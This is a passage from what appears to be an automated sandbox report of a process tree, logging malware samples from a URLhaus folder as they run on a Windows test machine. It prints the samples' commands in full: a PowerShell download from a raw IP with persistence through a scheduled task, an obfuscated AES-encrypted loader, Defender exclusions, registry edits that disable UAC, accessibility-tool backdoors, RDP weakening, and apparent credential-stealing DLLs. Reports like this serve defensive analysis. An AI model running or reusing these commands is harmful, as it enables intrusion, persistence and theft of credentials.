        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1960 /prefetch:2
        9⤵
        
        PID:5544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
        9⤵
        
        PID:5568
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
        9⤵
        
        PID:5996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
        9⤵
        
        PID:6028
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,7798941283357386581,9785834963748097858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
        9⤵
        
        PID:3880
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5236
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5492
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1700
- - C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    PID:5740
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 748
      4⤵
      Program crash
      PID:5888
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 796
      4⤵
      Program crash
      PID:5356
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 812
      4⤵
      Program crash
      PID:3972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 920
      4⤵
      Program crash
      PID:3192
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 940
      4⤵
      Program crash
      PID:5144
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 960
      4⤵
      Program crash
      PID:5416
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1132
      4⤵
      Program crash
      PID:5588
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1184
      4⤵
      Program crash
      PID:5796
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1236
      4⤵
      Program crash
      PID:404
  - - C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1968
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 540
        5⤵
        Program crash
        
        PID:5612
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 812
        5⤵
        Program crash
        
        PID:5956
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 832
        5⤵
        Program crash
        
        PID:5364
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 832
        5⤵
        Program crash
        
        PID:4040
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 872
        5⤵
        Program crash
        
        PID:5748
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1020
        5⤵
        Program crash
        
        PID:2232
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1048
        5⤵
        Program crash
        
        PID:5364
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1552
        5⤵
        Program crash
        
        PID:6900
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1556
        5⤵
        Program crash
        
        PID:7144
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1652
        5⤵
        Program crash
        
        PID:6928
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1552
        5⤵
        Program crash
        
        PID:5428
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1732
        5⤵
        Program crash
        
        PID:7160
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1644
        5⤵
        Program crash
        
        PID:208
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1868
        5⤵
        Program crash
        
        PID:6728
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1572
        5⤵
        Program crash
        
        PID:5888
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd"
        5⤵
        
        PID:6896
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd';$lAeq='GfZBCetCfZBCurfZBCrefZBCnfZBCtfZBCPrfZBCocfZBCefZBCsfZBCsfZBC'.Replace('fZBC', ''),'MaiPrpmnMoPrpmdPrpmulPrpmePrpm'.Replace('Prpm', ''),'CrIgJgeatIgJgeIgJgDeIgJgcIgJgryIgJgpIgJgtoIgJgrIgJg'.Replace('IgJg', ''),'EJqHmntJqHmrJqHmyPoJqHmintJqHm'.Replace('JqHm', ''),'EleDBwrmeDBwrntADBwrtDBwr'.Replace('DBwr', ''),'ChaFGFHnFGFHgFGFHeEFGFHxtFGFHeFGFHnsiFGFHonFGFH'.Replace('FGFH', ''),'TrFaEMansFaEMfoFaEMrmFaEMFinFaEMalBFaEMlFaEMockFaEM'.Replace('FaEM', ''),'IpACXnvpACXokpACXepACX'.Replace('pACX', ''),'Sssrbplissrbtssrb'.Replace('ssrb', ''),'DVGtReVGtRcomVGtRpreVGtRssVGtR'.Replace('VGtR', ''),'FroomPomBoomPasoomPe6oomP4SoomPtroomPingoomP'.Replace('oomP', ''),'ReaafWIdLafWIinafWIeafWIsafWI'.Replace('afWI', ''),'LIdMHoaIdMHdIdMH'.Replace('IdMH', ''),'CBGdXopBGdXyBGdXToBGdX'.Replace('BGdX', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($lAeq[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function PvrJj($TpxZW){$NbCzo=[System.Security.Cryptography.Aes]::Create();$NbCzo.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NbCzo.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NbCzo.Key=[System.Convert]::($lAeq[10])('wn6tmbO/rOORgxj74qEsSdU2WhE4KPXIqhTJPDz2aPY=');$NbCzo.IV=[System.Convert]::($lAeq[10])('gHqzXB7DsEnzxXPGoUcHcg==');$PddqI=$NbCzo.($lAeq[2])();$ySKdP=$PddqI.($lAeq[6])($TpxZW,0,$TpxZW.Length);$PddqI.Dispose();$NbCzo.Dispose();$ySKdP;}function rEEVf($TpxZW){$QUakK=New-Object System.IO.MemoryStream(,$TpxZW);$zUBgT=New-Object System.IO.MemoryStream;$PwRDy=New-Object System.IO.Compression.GZipStream($QUakK,[IO.Compression.CompressionMode]::($lAeq[9]));$PwRDy.($lAeq[13])($zUBgT);$PwRDy.Dispose();$QUakK.Dispose();$zUBgT.Dispose();$zUBgT.ToArray();}$lkrNY=[System.IO.File]::($lAeq[11])([Console]::Title);$aZZTu=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 5).Substring(2))));$cSjRs=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 6).Substring(2))));[System.Reflection.Assembly]::($lAeq[12])([byte[]]$cSjRs).($lAeq[3]).($lAeq[7])($null,$null);[System.Reflection.Assembly]::($lAeq[12])([byte[]]$aZZTu).($lAeq[3]).($lAeq[7])($null,$null); "
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5848
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        6⤵
        
        PID:4972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted')
        7⤵
        
        PID:7012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 46102' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Windows\system32\config\systemprofile\AppData\Roaming\Network46102Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1540
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1976
        5⤵
        Program crash
        
        PID:7984
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\clip64.dll, Main
        5⤵
        
        PID:8484
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main
        5⤵
        
        PID:2016
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main
        6⤵
        
        PID:7092
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5740 -s 1228
      4⤵
      Program crash
      PID:5868
- - C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"
    3⤵
    - Executes dropped EXE
    PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\cmd.cmd" "
    3⤵
    PID:5236
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:5436
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
      4⤵
      Event Triggered Execution: Image File Execution Options Injection
      PID:2856
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
      4⤵
      Event Triggered Execution: Image File Execution Options Injection
      PID:5468
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
      4⤵
      Event Triggered Execution: Image File Execution Options Injection
      PID:5132
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"
      4⤵
      Event Triggered Execution: Image File Execution Options Injection
      PID:5728
  - - C:\Windows\system32\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fDenyTSConnections /t REG_DWORD /d "00000000"
      4⤵
      PID:5696
  - - C:\Windows\system32\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v fAllowUnsolicited /t REG_DWORD /d "00000001"
      4⤵
      PID:5564
  - - C:\Windows\system32\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /f /v UserAuthentication /t REG_DWORD /d "00000000"
      4⤵
      PID:5884
  - - C:\Windows\system32\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /f /v SecurityLayer /t REG_DWORD /d "00000001"
      4⤵
      PID:5412
- - C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"
    3⤵
    - Executes dropped EXE
    PID:6136
- - C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2936
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E9A.tmp\3E9B.tmp\3E9C.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"
      4⤵
      PID:4732
    - - C:\Windows\system32\mshta.exe
        
        mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
        5⤵
        Checks computer location settings
        Access Token Manipulation: Create Process with Token
        
        PID:4040
      - C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE
        
        "C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:336
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\40CD.tmp\40CE.tmp\40CF.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"
        7⤵
        
        PID:5708
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:5512
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:3928
        
        C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        8⤵
        UAC bypass
        
        PID:3808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        8⤵
        
        PID:3196
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        9⤵
        
        PID:4752
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        8⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5240
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718
        9⤵
        
        PID:5992
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
        9⤵
        
        PID:2184
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4852
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8
        9⤵
        
        PID:3156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
        9⤵
        
        PID:5924
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
        9⤵
        
        PID:5548
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1
        9⤵
        
        PID:5040
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8
        9⤵
        
        PID:4172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5436 /prefetch:8
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1
        9⤵
        
        PID:1156
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
        9⤵
        
        PID:4364
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1
        9⤵
        
        PID:6464
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,9693803372023431205,9594669865106553876,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
        9⤵
        
        PID:6472
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        8⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5416
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1576
- - C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe"
    3⤵
    - Executes dropped EXE
    PID:5028
- - C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5808
- - C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"
    3⤵
    - Executes dropped EXE
    PID:5140
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd
      4⤵
      PID:6192
- - C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:6324
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6404
  - - C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SendNotifyMessage
      PID:6544
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6844
- - C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe
    "C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    PID:6620
  - - C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
      4⤵
      Event Triggered Execution: Image File Execution Options Injection
      Checks computer location settings
      Executes dropped EXE
